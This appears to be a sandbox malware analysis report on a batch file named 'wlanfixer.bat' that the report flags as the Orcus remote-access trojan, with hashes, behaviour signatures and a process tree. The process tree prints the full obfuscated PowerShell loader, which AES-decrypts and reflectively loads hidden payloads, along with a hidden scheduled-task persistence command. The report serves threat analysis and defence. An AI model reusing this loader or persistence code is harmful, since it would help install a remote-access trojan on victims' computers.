Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
23/04/2024, 13:12
Static task
static1
Behavioral task
behavioral1
Sample
wlanfixer.bat
Resource
win7-20240221-en
General
-
Target
wlanfixer.bat
-
Size
3.5MB
-
MD5
45730c9d81cdc2677ea2bd082eb79edb
-
SHA1
7ece7b975ab6506d83dac94f685e2cedbe56dd6b
-
SHA256
31f17bf44fd2ce3fb0fde898d5bea0c35d18c82d3e2e9fcdae3cb8cd9f9fffb4
-
SHA512
d4504b96971c71e38207b56ada95f5e78f8536aaa88a3cbeebaa16627ff548f620672c0d4c61e74707fdc2662ec99584b5dc8d6e3fa1b7056f9595531422b687
-
SSDEEP
49152:mR8s3zr/pxAN80OHguszxrEC/agxlnUrLvlKNNwI:d
Malware Config
Signatures
-
Orcurs Rat Executable 1 IoCs
resource yara_rule behavioral2/memory/4748-54-0x00000121FE090000-0x00000121FE38A000-memory.dmp orcus -
Blocklisted process makes network request 11 IoCs
flow pid Process 34 4748 powershell.exe 48 4748 powershell.exe 62 4748 powershell.exe 63 4748 powershell.exe 64 4748 powershell.exe 76 4748 powershell.exe 78 4748 powershell.exe 82 4748 powershell.exe 93 4748 powershell.exe 94 4748 powershell.exe 95 4748 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 4228 powershell.exe 4228 powershell.exe 1884 powershell.exe 1884 powershell.exe 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4228 powershell.exe Token: SeDebugPrivilege 1884 powershell.exe Token: SeIncreaseQuotaPrivilege 1884 powershell.exe Token: SeSecurityPrivilege 1884 powershell.exe Token: SeTakeOwnershipPrivilege 1884 powershell.exe Token: SeLoadDriverPrivilege 1884 powershell.exe Token: SeSystemProfilePrivilege 1884 powershell.exe Token: SeSystemtimePrivilege 1884 powershell.exe Token: SeProfSingleProcessPrivilege 1884 powershell.exe Token: SeIncBasePriorityPrivilege 1884 powershell.exe Token: SeCreatePagefilePrivilege 1884 powershell.exe Token: SeBackupPrivilege 1884 powershell.exe Token: SeRestorePrivilege 1884 powershell.exe Token: SeShutdownPrivilege 1884 powershell.exe Token: SeDebugPrivilege 1884 powershell.exe Token: SeSystemEnvironmentPrivilege 1884 powershell.exe Token: SeRemoteShutdownPrivilege 1884 powershell.exe Token: SeUndockPrivilege 1884 powershell.exe Token: SeManageVolumePrivilege 1884 powershell.exe Token: 33 1884 powershell.exe Token: 34 1884 powershell.exe Token: 35 1884 powershell.exe Token: 36 1884 powershell.exe Token: SeIncreaseQuotaPrivilege 1884 powershell.exe Token: SeSecurityPrivilege 1884 powershell.exe Token: SeTakeOwnershipPrivilege 1884 powershell.exe Token: SeLoadDriverPrivilege 1884 powershell.exe Token: SeSystemProfilePrivilege 1884 powershell.exe Token: SeSystemtimePrivilege 1884 powershell.exe Token: SeProfSingleProcessPrivilege 1884 powershell.exe Token: SeIncBasePriorityPrivilege 1884 powershell.exe Token: SeCreatePagefilePrivilege 1884 powershell.exe Token: SeBackupPrivilege 1884 powershell.exe Token: SeRestorePrivilege 1884 powershell.exe Token: SeShutdownPrivilege 1884 powershell.exe Token: SeDebugPrivilege 1884 powershell.exe Token: SeSystemEnvironmentPrivilege 1884 powershell.exe Token: SeRemoteShutdownPrivilege 1884 powershell.exe Token: SeUndockPrivilege 1884 powershell.exe Token: SeManageVolumePrivilege 1884 powershell.exe Token: 33 1884 powershell.exe Token: 34 1884 powershell.exe Token: 35 1884 powershell.exe Token: 36 1884 powershell.exe Token: SeIncreaseQuotaPrivilege 1884 powershell.exe Token: SeSecurityPrivilege 1884 powershell.exe Token: SeTakeOwnershipPrivilege 1884 powershell.exe Token: SeLoadDriverPrivilege 1884 powershell.exe Token: SeSystemProfilePrivilege 1884 powershell.exe Token: SeSystemtimePrivilege 1884 powershell.exe Token: SeProfSingleProcessPrivilege 1884 powershell.exe Token: SeIncBasePriorityPrivilege 1884 powershell.exe Token: SeCreatePagefilePrivilege 1884 powershell.exe Token: SeBackupPrivilege 1884 powershell.exe Token: SeRestorePrivilege 1884 powershell.exe Token: SeShutdownPrivilege 1884 powershell.exe Token: SeDebugPrivilege 1884 powershell.exe Token: SeSystemEnvironmentPrivilege 1884 powershell.exe Token: SeRemoteShutdownPrivilege 1884 powershell.exe Token: SeUndockPrivilege 1884 powershell.exe Token: SeManageVolumePrivilege 1884 powershell.exe Token: 33 1884 powershell.exe Token: 34 1884 powershell.exe Token: 35 1884 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4748 powershell.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 4748 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 1432 wrote to memory of 4228 1432 cmd.exe 91 PID 1432 wrote to memory of 4228 1432 cmd.exe 91 PID 4228 wrote to memory of 1884 4228 powershell.exe 92 PID 4228 wrote to memory of 1884 4228 powershell.exe 92 PID 4228 wrote to memory of 3608 4228 powershell.exe 95 PID 4228 wrote to memory of 3608 4228 powershell.exe 95 PID 3608 wrote to memory of 3536 3608 WScript.exe 96 PID 3608 wrote to memory of 3536 3608 WScript.exe 96 PID 3536 wrote to memory of 4748 3536 cmd.exe 98 PID 3536 wrote to memory of 4748 3536 cmd.exe 98
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\wlanfixer.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RoF8A1JenCTYvN5F1s7vRkzErCsX+lTeTh7sYe5+YqQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p+fhmC+G5ORMSHe10ZC4cg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $CViub=New-Object System.IO.MemoryStream(,$param_var); $bMvnM=New-Object System.IO.MemoryStream; $IwWYG=New-Object System.IO.Compression.GZipStream($CViub, [IO.Compression.CompressionMode]::Decompress); $IwWYG.CopyTo($bMvnM); $IwWYG.Dispose(); $CViub.Dispose(); $bMvnM.Dispose(); $bMvnM.ToArray();}function execute_function($param_var,$param2_var){ $vQMJY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GYRaA=$vQMJY.EntryPoint; $GYRaA.Invoke($null, $param2_var);}$uwemL = 'C:\Users\Admin\AppData\Local\Temp\wlanfixer.bat';$host.UI.RawUI.WindowTitle = $uwemL;$WQdbL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($uwemL).Split([Environment]::NewLine);foreach ($CKiFo in $WQdbL) { if ($CKiFo.StartsWith(':: ')) { $vOqbs=$CKiFo.Substring(3); break; }}$payloads_var=[string[]]$vOqbs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4228 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_964_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_964.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1884
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_964.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3608 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_964.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:3536 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RoF8A1JenCTYvN5F1s7vRkzErCsX+lTeTh7sYe5+YqQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p+fhmC+G5ORMSHe10ZC4cg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $CViub=New-Object System.IO.MemoryStream(,$param_var); $bMvnM=New-Object System.IO.MemoryStream; $IwWYG=New-Object System.IO.Compression.GZipStream($CViub, [IO.Compression.CompressionMode]::Decompress); $IwWYG.CopyTo($bMvnM); $IwWYG.Dispose(); $CViub.Dispose(); $bMvnM.Dispose(); $bMvnM.ToArray();}function execute_function($param_var,$param2_var){ $vQMJY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GYRaA=$vQMJY.EntryPoint; $GYRaA.Invoke($null, $param2_var);}$uwemL = 'C:\Users\Admin\AppData\Roaming\startup_str_964.bat';$host.UI.RawUI.WindowTitle = $uwemL;$WQdbL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($uwemL).Split([Environment]::NewLine);foreach ($CKiFo in $WQdbL) { if ($CKiFo.StartsWith(':: ')) { $vOqbs=$CKiFo.Substring(3); break; }}$payloads_var=[string[]]$vOqbs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4748
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
1KB
MD5ff2ebc63009127bf2c74f18dc727774e
SHA1603a245252097e9b8d6823e08a76361ba94f7720
SHA2565048a68ea6a51a2a93fba28d043dbcc8ae067225e4e1b9569a74caac617e9a42
SHA51215b4baf594f91eba3ad7d390859140220da191bfc9de2eeeca5455a643ce5b19cd88b221e354d6a577df799564cc73285f2418108d2b850630196053ac53007b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.5MB
MD545730c9d81cdc2677ea2bd082eb79edb
SHA17ece7b975ab6506d83dac94f685e2cedbe56dd6b
SHA25631f17bf44fd2ce3fb0fde898d5bea0c35d18c82d3e2e9fcdae3cb8cd9f9fffb4
SHA512d4504b96971c71e38207b56ada95f5e78f8536aaa88a3cbeebaa16627ff548f620672c0d4c61e74707fdc2662ec99584b5dc8d6e3fa1b7056f9595531422b687
-
Filesize
115B
MD5e2839c6e276e0e1e65cd343d3afd8423
SHA1853ffa8a050c4b9c608dd0f85ad30fdf15b3ac5c
SHA256df5ccd14db28ca84f195d87231dfe9ebead2ee1d30142691ef6973310bdd4056
SHA512039510ae8794cb33dfedf7197adbbce4ece3411cdea1094261df9f84ae05a4143dbbbe993ab9084fb353e4f90d756704e58e114d1c110f7b9d394ebc4bc80874